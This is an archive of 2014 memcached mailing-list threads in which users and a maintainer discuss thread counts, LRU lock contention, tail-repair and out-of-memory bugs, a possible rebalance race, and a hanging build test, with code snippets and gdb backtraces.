On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server/instance? Thanks, Claudio -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached instance and thread configuration parameters
You could run one instance with one thread and serve all of that just fine. have you actually looked at graphs of the CPU usage of the host? memcached should be practically idle with load that low. One with -t 6 or -t 8 would do it just fine. On Mon, 4 Aug 2014, Claudio Santana wrote: Dormando, thanks for the quick response. Sorry for the confusion, I don't have exact metrics per second but per minute 1.12 million sets and 1.8 million gets which translates to 18,666 sets per minute and 30,000 gets per second. These stats are per Memcached instance which I currently run 3 on each server. Claudio. On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote: On Mon, 4 Aug 2014, Claudio Santana wrote: I have this Memcached cluster where 3 instances of Memcached run in a single server. These servers have 24 cores, each instance is configured to have 8 threads each. Each individual instance serves have about 5000G gets/sets a day and about 3k current connections. I don't know what 5000G gets/sets a day translates to in per-second (nor what the G-unit even is?), can you define this? What would be better? consolidate these 3 instances to a single instance per server with 24 threads? I've read in a few articles that Memcached's performance starts suffering with more than 4-6 threads per instance, is this generally true? How about keeping the 3 instances per server and decreasing the number of threads to say 4 or 6? or creating 4 instances in the same servers instead of 3 and decreasing the number of threads per instance to 6 so there is one thread per core. Is there a guide you could recommend to configure the right number of threads and strategies to get the most out of a Memcached server/instance? Thanks, Claudio -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: LRU lock per slab class
Hello Dormando, Thanks for the answer. The LRU fiddling only happens once a minute per item, so hot items don't affect the lock as much. The more you lean toward hot items the better it scales as-is. = For linked-list traversal, pthreads acquire item-partitioned lock. But threads acquire global lock for LRU update. So, all the GET commands that found requested item on the hash table tries to acquire the same lock, so, I think the total hit rate is more affecting factor to the lock contention than how often each item is touched for LRU update. I missed something?? The GET command only acquires the LRU lock if it's been more than a minute since the last time it was retrieved. That's all there is to it. I don't think anything stops it. Rebalance tends to stay within one class. It was on my list of scalability fixes to work on, but I postponed it for a few reasons. One is that most tend to have over half of their requests in one slab class. So splitting the lock doesn't give as much of a long term benefit. So, I wanted to come back to it later and see what other options were plausible for scaling the lru within a single slab class. Nobody's complained about the performance after the last round of work as well, so it stays low priority. Are your objects always only hit once per minute? What kind of performance are you seeing and what do you need to get out of it? = Thanks for your comments. I was trying to find some proper network speed(1Gb,10Gb) for current memcached operation. I saw the best performance around 4~6 threads (1.1M rps) with the help of multi-get. With the LRU out of the way it does go up to 12-16 threads. Also if you use numactl to pin it to one node it seems to do better... but most people just don't hit it that hard, so it doesn't matter? 2014년 8월 2일 토요일 오전 8시 19분 59초 UTC+9, Dormando 님의 말: On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungch...@gmail.com wrote: Hello, I'm testing the scalability of memcached-1.4.20 version in a GET dominated system. For a linked-list traversal in a hash table (do_item_get), it is protected by interleaved lock (per bucket), so it showed very high scalability. But, after linked-list traversal, LRU update is protected by a global lock (cache_lock), so the scalability was limited around 4~6 threads by global lock of the LRU update global in a Xeon server system (10Gb ethernet). The LRU fiddling only happens once a minute per item, so hot items don't affect the lock as much. The more you lean toward hot items the better it scales as-is. As i know, LRU is maintained per slab class, so LRU update modifies only the items contained in the same class. So, i think the global lock of LRU update may be changed to interleaved lock per slab class. By SET command at the same time, store and removal of items in the same class can happen concurrently, but SET operation also can be changed to get the slab class lock before adding/removing some new items to/from the slab class. In case of store/removal of the linked item in the hash table (which may reside on the different slab class), it only updates the h_next value of current item, and it does not touch LRU pointers (next, prev). So, i think it would be safe to change to interleaved lock. Are there any other reasons that LRU update requires a global lock that I missed ?? (I'm not using slab rebalance and giving an initial hash power value large enough, and clients only use GET, SET commands) I don't think anything stops it. Rebalance tends to stay within one class. It was on my list of scalability fixes to work on, but I postponed it for a few reasons. One is that most tend to have over half of their requests in one slab class. So splitting the lock doesn't give as much of a long term benefit. So, I wanted to come back to it later and see what other options were plausible for scaling the lru within a single slab class. Nobody's complained about the performance after the last round of work as well, so it stays low priority. Are your objects always only hit once per minute? What kind of performance are you seeing and what do you need to get out of it? It would be highly appreciated for any comments!! -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from
Re: LRU lock per slab class
On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungchul.h...@gmail.com wrote: Hello, I'm testing the scalability of memcached-1.4.20 version in a GET dominated system. For a linked-list traversal in a hash table (do_item_get), it is protected by interleaved lock (per bucket), so it showed very high scalability. But, after linked-list traversal, LRU update is protected by a global lock (cache_lock), so the scalability was limited around 4~6 threads by global lock of the LRU update global in a Xeon server system (10Gb ethernet). The LRU fiddling only happens once a minute per item, so hot items don't affect the lock as much. The more you lean toward hot items the better it scales as-is. As i know, LRU is maintained per slab class, so LRU update modifies only the items contained in the same class. So, i think the global lock of LRU update may be changed to interleaved lock per slab class. By SET command at the same time, store and removal of items in the same class can happen concurrently, but SET operation also can be changed to get the slab class lock before adding/removing some new items to/from the slab class. In case of store/removal of the linked item in the hash table (which may reside on the different slab class), it only updates the h_next value of current item, and it does not touch LRU pointers (next, prev). So, i think it would be safe to change to interleaved lock. Are there any other reasons that LRU update requires a global lock that I missed ?? (I'm not using slab rebalance and giving an initial hash power value large enough, and clients only use GET, SET commands) I don't think anything stops it. Rebalance tends to stay within one class. It was on my list of scalability fixes to work on, but I postponed it for a few reasons. One is that most tend to have over half of their requests in one slab class. So splitting the lock doesn't give as much of a long term benefit. So, I wanted to come back to it later and see what other options were plausible for scaling the lru within a single slab class. Nobody's complained about the performance after the last round of work as well, so it stays low priority. Are your objects always only hit once per minute? What kind of performance are you seeing and what do you need to get out of it? It would be highly appreciated for any comments!! -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Dormando,Sure, I waited till Monday (our usual tailrepair/oom errors day) but we did not have any issues today :). I will continue to monitor and will grab stats conns next time. Great, thanks! As for network issues during the last time - i do not see any but still trying to find. This can be good explanation why we have such events grouped in time. As for keepalive - we use default php-memcached/libmemcached setting (do not change it) and as I see libmemcached does not set SO_KEEPALIVE. Do you recommend to set it? Lets see what stats conns says first. I guess it's theoretically possible that an item was leaked, but was actually fetched (and expired properly) at some point, fixing the issue. Would've still leaked the item though. So if 'stats conns' doesn't show some hung clients we might still have a reference leak somewhere. Which would be sad since Steven Grimm fixed a number of them just recently.. On Wednesday, July 2, 2014 7:32:14 PM UTC-7, Dormando wrote: Thanks! This is a little exciting actually, it's a new bug! tailrepairs was only necessary when an item was legitimately leaked; if we don't reap it, it never gets better. However you stated that for three hours all sets fail (and at the same time some .15's crashed). Then it self-recovered. The .15 crashes were likely from the bug I fixed; where an active item is fetched from the tail, but then reclaimed because it's old. The .20 OOM is the defensive code working perfectly; something has somehow retained a legitimate reference to an item for multiple hours! More than one even, since the tail is walked up by several items while looking for something to free. Did you have any network blips, application server crashes, or the like? It sounds like some connections are dying in such a way that they time out, which is a very long timeout somehow (no tcp keepalives?). What's *extra* exciting is that 1.4.20 now has the stats conns command. If this happens again, while a .20 machine is actively OOM'ing, can you grab a couple copies of the stats conns output, a few minutes apart? That should definitively tell us if there are stuck connections causing this issue. Someone had a PR open for adding idle connection timeouts, but I asked them to redo it on top of the 'stats conns' work as a more efficient background thread. I could potentially finish this and it would be usable as a workaround. You could also enable tcp keepalives, or otherwise fix whatever's causing these events. I wonder if it's also worth attempting to relink an item that ends up in the tail but has references? That would at least potentially get them out of the way of memory reclamation. Thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: 1) OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? correct 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? sent you _current_ stats from the server that had OOM couple days ago and still running (now with no issues). 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? correct we will enable saving stderr to log. may be this can show something. If you have any other ideas - let me know. -denis On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote: Cool. That is disappointing. Can you clarify a few things for me: 1) You're saying that you were getting OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? If it's not a crash, and your hash power level isn't expanding, I don't think it's related to the other bug. thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: Dormando, sure, we will add option to preset hashtable. (as i see nn should be 26). One question: as i see in logs for the servers there is no change for hash_power_level before incident (it would be hard to say for crushed but .20 just had outofmemory and i have solid stats). Does not this contradict the idea of cause? Server had
Re: slab re-balance seems not thread-safty
Seems like you're right.. I'd re-arranged where the LRU lock (cache_lock) is called then forgot to update that one bit. Most of the do_item_unlink code is safe there, until it gets into the LRU bits. It's unlikely anyone actually saw a crash from this as it's a narrow race though. That's easy to fix. It's still necessary to delete it, since threads can stack around a handful of objects and cause rebalance to hang. Thanks! On Thu, 3 Jul 2014, Zhiwei Chan wrote: the item lock can only protect the hash list, but what about the LRU list? As far as i know, if trying to delete a node from a doubly-linked-list, it is necessary to lock at least 3 node: node, node-pre, node-next. I will try to check if it may crash the LRU list in gdb next week . And I think in do_item_get it is not necessary to delete the item that is re-balanced, just leave it there and return NULL seems better. 在 2014年7月3日星期四UTC+8下午1时30分29秒,Dormando写道: the item lock is already held for that key when do_item_get is called, which is why the nolock code is called there. slab rebalance has that second short-circuiting of fetches to ensure very hot items don't permanently jam a page move. On Wed, 2 Jul 2014, Zhiwei Chan wrote: Hi all, I have thought carefully about the the thread-safe memcached recently, and found that if the re-balance is running, it may not thread-safety. The code do_item_get-do_item_unlink_nolock may corrupt the hash table. Whenever it trying to modify the hash table, it should get cache_lock, but the function do_item_get have not got the cache_lock. Please tell me if anything i neglected. /** wrapper around assoc_find which does the lazy expiration logic */ item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) { //mutex_lock(cache_lock); item *it = assoc_find(key, nkey, hv); if (it != NULL) { refcount_incr(it-refcount); /* Optimization for slab reassignment. prevents popular items from * jamming in busy wait. Can only do this here to satisfy lock order * of item_lock, cache_lock, slabs_lock. */ if (slab_rebalance_signal ((void *)it = slab_rebal.slab_start (void *)it slab_rebal.slab_end)) { do_item_unlink_nolock(it, hv); --- no lock before unlink. do_item_remove(it); it = NULL; } } -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Cool. That is disappointing. Can you clarify a few things for me: 1) You're saying that you were getting OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? If it's not a crash, and your hash power level isn't expanding, I don't think it's related to the other bug. thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: Dormando, sure, we will add option to preset hashtable. (as i see nn should be 26). One question: as i see in logs for the servers there is no change for hash_power_level before incident (it would be hard to say for crushed but .20 just had outofmemory and i have solid stats). Does not this contradict the idea of cause? Server had hash_power_level = 26 for days before and still has 26 days after. Just for three hours every set for slab 13 failed. We did not reboot/flush server and it continues to work without problem. What do you think? On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote: Hey, Can you presize the hash table? (-o hashpower=nn) to be large enough on those servers such that hash expansion won't happen at runtime? You can see what hashpower is on a long running server via stats to know what to set the value to. If that helps, we might still have a bug in hash expansion. I see someone finally reproduced a possible issue there under .20. .17/.19 fix other causes of the problem pretty thoroughly though. On Tue, 1 Jul 2014, Denis Samoylov wrote: Hi, We had sporadic memory corruption due tail repair in pre .20 version. So we updated some our servers to .20. This Monday we observed several crushes in .15 version and tons of allocation failure in .20 version. This is expected as .20 just disables tail repair but it seems the problem is still there. What is interesting: 1) there is no visible change in traffic and only one slab is affected usually. 2) this always happens with several but not all servers :) Is there any way to catch this and help with debug? I have all slab and item stats for the time around incident for .15 and .20 version. .15 is clearly memory corruption: gdb shows that hash function returned 0 (line 115 uint32_t hv = hash(ITEM_key(search), search-nkey, 0);). so we seems hitting this comment: /* Old rare bug could cause a refcount leak. We haven't seen * it in years, but we leave this code in to prevent failures * just in case */ :) Thank you, Denis -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Thanks! This is a little exciting actually, it's a new bug! tailrepairs was only necessary when an item was legitimately leaked; if we don't reap it, it never gets better. However you stated that for three hours all sets fail (and at the same time some .15's crashed). Then it self-recovered. The .15 crashes were likely from the bug I fixed; where an active item is fetched from the tail, but then reclaimed because it's old. The .20 OOM is the defensive code working perfectly; something has somehow retained a legitimate reference to an item for multiple hours! More than one even, since the tail is walked up by several items while looking for something to free. Did you have any network blips, application server crashes, or the like? It sounds like some connections are dying in such a way that they time out, which is a very long timeout somehow (no tcp keepalives?). What's *extra* exciting is that 1.4.20 now has the stats conns command. If this happens again, while a .20 machine is actively OOM'ing, can you grab a couple copies of the stats conns output, a few minutes apart? That should definitively tell us if there are stuck connections causing this issue. Someone had a PR open for adding idle connection timeouts, but I asked them to redo it on top of the 'stats conns' work as a more efficient background thread. I could potentially finish this and it would be usable as a workaround. You could also enable tcp keepalives, or otherwise fix whatever's causing these events. I wonder if it's also worth attempting to relink an item that ends up in the tail but has references? That would at least potentially get them out of the way of memory reclamation. Thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: 1) OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? correct 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? sent you _current_ stats from the server that had OOM couple days ago and still running (now with no issues). 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? correct we will enable saving stderr to log. may be this can show something. If you have any other ideas - let me know. -denis On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote: Cool. That is disappointing. Can you clarify a few things for me: 1) You're saying that you were getting OOM's on slab 13, but it recovered on its own? This is under version 1.4.20 and you did *not* enable tail repairs? 2) Can you share (with me at least) the full stats/stats items/stats slabs output from one of the affected servers running 1.4.20? 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting write failures? If it's not a crash, and your hash power level isn't expanding, I don't think it's related to the other bug. thanks! On Wed, 2 Jul 2014, Denis Samoylov wrote: Dormando, sure, we will add option to preset hashtable. (as i see nn should be 26). One question: as i see in logs for the servers there is no change for hash_power_level before incident (it would be hard to say for crushed but .20 just had outofmemory and i have solid stats). Does not this contradict the idea of cause? Server had hash_power_level = 26 for days before and still has 26 days after. Just for three hours every set for slab 13 failed. We did not reboot/flush server and it continues to work without problem. What do you think? On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote: Hey, Can you presize the hash table? (-o hashpower=nn) to be large enough on those servers such that hash expansion won't happen at runtime? You can see what hashpower is on a long running server via stats to know what to set the value to. If that helps, we might still have a bug in hash expansion. I see someone finally reproduced a possible issue there under .20. .17/.19 fix other causes of the problem pretty thoroughly though. On Tue, 1 Jul 2014, Denis Samoylov wrote: Hi, We had sporadic memory corruption due tail repair in pre .20 version. So we updated some our servers to .20. This Monday we observed several crushes in .15 version and tons of allocation failure in .20 version. This is expected as .20 just disables tail repair but it seems the problem is still there. What is interesting: 1) there is no visible change in traffic and only one slab is affected usually. 2
Re: slab re-balance seems not thread-safty
the item lock is already held for that key when do_item_get is called, which is why the nolock code is called there. slab rebalance has that second short-circuiting of fetches to ensure very hot items don't permanently jam a page move. On Wed, 2 Jul 2014, Zhiwei Chan wrote: Hi all, I have thought carefully about the the thread-safe memcached recently, and found that if the re-balance is running, it may not thread-safety. The code do_item_get-do_item_unlink_nolock may corrupt the hash table. Whenever it trying to modify the hash table, it should get cache_lock, but the function do_item_get have not got the cache_lock. Please tell me if anything i neglected. /** wrapper around assoc_find which does the lazy expiration logic */ item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) { //mutex_lock(cache_lock); item *it = assoc_find(key, nkey, hv); if (it != NULL) { refcount_incr(it-refcount); /* Optimization for slab reassignment. prevents popular items from * jamming in busy wait. Can only do this here to satisfy lock order * of item_lock, cache_lock, slabs_lock. */ if (slab_rebalance_signal ((void *)it = slab_rebal.slab_start (void *)it slab_rebal.slab_end)) { do_item_unlink_nolock(it, hv); --- no lock before unlink. do_item_remove(it); it = NULL; } } -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: tail repair issue (1.4.20)
Hey, Can you presize the hash table? (-o hashpower=nn) to be large enough on those servers such that hash expansion won't happen at runtime? You can see what hashpower is on a long running server via stats to know what to set the value to. If that helps, we might still have a bug in hash expansion. I see someone finally reproduced a possible issue there under .20. .17/.19 fix other causes of the problem pretty thoroughly though. On Tue, 1 Jul 2014, Denis Samoylov wrote: Hi, We had sporadic memory corruption due tail repair in pre .20 version. So we updated some our servers to .20. This Monday we observed several crushes in .15 version and tons of allocation failure in .20 version. This is expected as .20 just disables tail repair but it seems the problem is still there. What is interesting: 1) there is no visible change in traffic and only one slab is affected usually. 2) this always happens with several but not all servers :) Is there any way to catch this and help with debug? I have all slab and item stats for the time around incident for .15 and .20 version. .15 is clearly memory corruption: gdb shows that hash function returned 0 (line 115 uint32_t hv = hash(ITEM_key(search), search-nkey, 0);). so we seems hitting this comment: /* Old rare bug could cause a refcount leak. We haven't seen * it in years, but we leave this code in to prevent failures * just in case */ :) Thank you, Denis -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: slabclass_t.slots
Yes this is fixed in .17. 1.4.20 is the recommended version. The corruption isn't in this function, it's outside of it: https://github.com/memcached/memcached/pull/67 On Wed, 4 Jun 2014, Denis Samoylov wrote: hi, We got a segfault today (stack is below if interesting, we use 1.4.15 and yes i saw Dormando comment about some fixes in .17 but I cannot trace any fix related). My question is actually slightly different - i do grep and i do not see where we initialize slabclass_t-slots. It is set to 0(zero) in slabs_init (by memset). And also I see 8 usages across the file slabs.c including one declaration and one assert (that will cause segfault :) ). in do_slabs_alloc, i immediately see code: it = (item *)p-slots; p-slots = it-next; which assumes that p-slots contains something. But i do not see where slots gets value. I definitely miss something simple. Pls point this field initialization code. (all other usages in free and rebalance that we do not use and i assume are used after something is allocated :) ) Thank you! segfault call stack: #0 do_slabs_alloc (size=853, id=11) at slabs.c:241 #1 slabs_alloc (size=853, id=11) at slabs.c:404 #2 0x0040edc4 in do_item_alloc ( key=0x7f256713e4d4 d_1_v1422c8a1df8a89589777042ac1257ea35|folder_by_id.2041369764.children, nkey=71, flags=value optimized out, exptime=1049722, nbytes=717, cur_hv=2547497763) at items.c:150 #3 0x00409476 in process_update_command (c=0x7f256451ed50, tokens=value optimized out, ntokens=value optimized out, comm=2, handle_cas=value optimized out) at memcached.c:2917 #4 0x004099ab in process_command (c=0x7f256451ed50, command=value optimized out) at memcached.c:3258 #5 0x0040a5a2 in try_read_command (c=0x7f256451ed50) at memcached.c:3504 #6 0x0040b1a8 in drive_machine (fd=value optimized out, which=value optimized out, arg=0x7f256451ed50) at memcached.c:3824 -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
I may have misread. When you said the server was sitting at 100% CPU, what exactly was using all of the CPU? memcached? perl? On Wed, 28 May 2014, Alex Gemmell wrote: Yep, it's 1.4.20. I followed the instructions here http://memcached.org/downloads and ran wget http://memcached.org/latest;. Just to be sure, this morning I ran wget http://memcached.org/files/memcached-1.4.20.tar.gz; and tried to compile it and got exactly the same problem. I followed your instructions and here's the output (I hope I did this right?) == (gdb) thread apply all bt Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x00416bc9 in item_crawler_thread (arg=value optimized out) at items.c:772 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 6 (Thread 0x752dd700 (LWP 8773)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x0041860d in assoc_maintenance_thread (arg=value optimized out) at assoc.c:251 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 5 (Thread 0x75cde700 (LWP 8772)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x645f30) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 4 (Thread 0x766df700 (LWP 8771)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x642ba0) at thread.c:386 ---Type return to continue, or q return to quit--- #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 3 (Thread 0x770e0700 (LWP 8770)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63f810) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 2 (Thread 0x77ae1700 (LWP 8769)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63c480) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 1 (Thread 0x77b8d700 (LWP 8766)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x00408a25 in main (argc=value optimized out, argv=value optimized out) at memcached.c:5628 == On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote: You're completely sure that's the 1.4.20 source tree? That bug was pretty well fixed... If you are definitely testing a 1.4.20 binary, here's the way to grab a trace: start memcached-debug under gdb: gdb ./memcached-debug handle SIGPIPE nostop noprint pass r T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t ... wait until it's been spinning cpu for a few seconds. Then ^C the GDB window and run thread apply all bt .. and send me that info. On Tue, 27 May 2014, Alex Gemmell wrote: Hello Dormando, I am having exactly the same issue but with Memcached 1.4.20. My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 1880MB RAM, single core :( Here are the results of me running prove -v t/lru-crawler.t. It took exactly 10m 15s to run before it timed out. I watched htop while it was running and the single CPU sat at 100% (which is to be expected I guess) but the total server memory barely changed and never rose above 330MB. = prove -v t/lru-crawler.t t/lru-crawler.t .. 1..189 ok 1 ok 2 - stored key ok 3 - stored key ok 4 - stored key ok 5 - stored key
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
Can you try this patch? https://github.com/dormando/memcached/commit/724bfb34484347963a27051fed2b4312e189ace3 Either apply it yourself, or just download the raw file: https://raw.githubusercontent.com/dormando/memcached/724bfb34484347963a27051fed2b4312e189ace3/t/lru-crawler.t On Wed, 28 May 2014, Alex Gemmell wrote: Perl mostly. Screenshot - https://cloudup.com/c-osDM4rjYU On Wednesday, 28 May 2014 11:16:22 UTC-7, Dormando wrote: I may have misread. When you said the server was sitting at 100% CPU, what exactly was using all of the CPU? memcached? perl? On Wed, 28 May 2014, Alex Gemmell wrote: Yep, it's 1.4.20. I followed the instructions here http://memcached.org/downloads and ran wget http://memcached.org/latest;. Just to be sure, this morning I ran wget http://memcached.org/files/memcached-1.4.20.tar.gz; and tried to compile it and got exactly the same problem. I followed your instructions and here's the output (I hope I did this right?) == (gdb) thread apply all bt Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x00416bc9 in item_crawler_thread (arg=value optimized out) at items.c:772 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 6 (Thread 0x752dd700 (LWP 8773)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x0041860d in assoc_maintenance_thread (arg=value optimized out) at assoc.c:251 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 5 (Thread 0x75cde700 (LWP 8772)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x645f30) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from 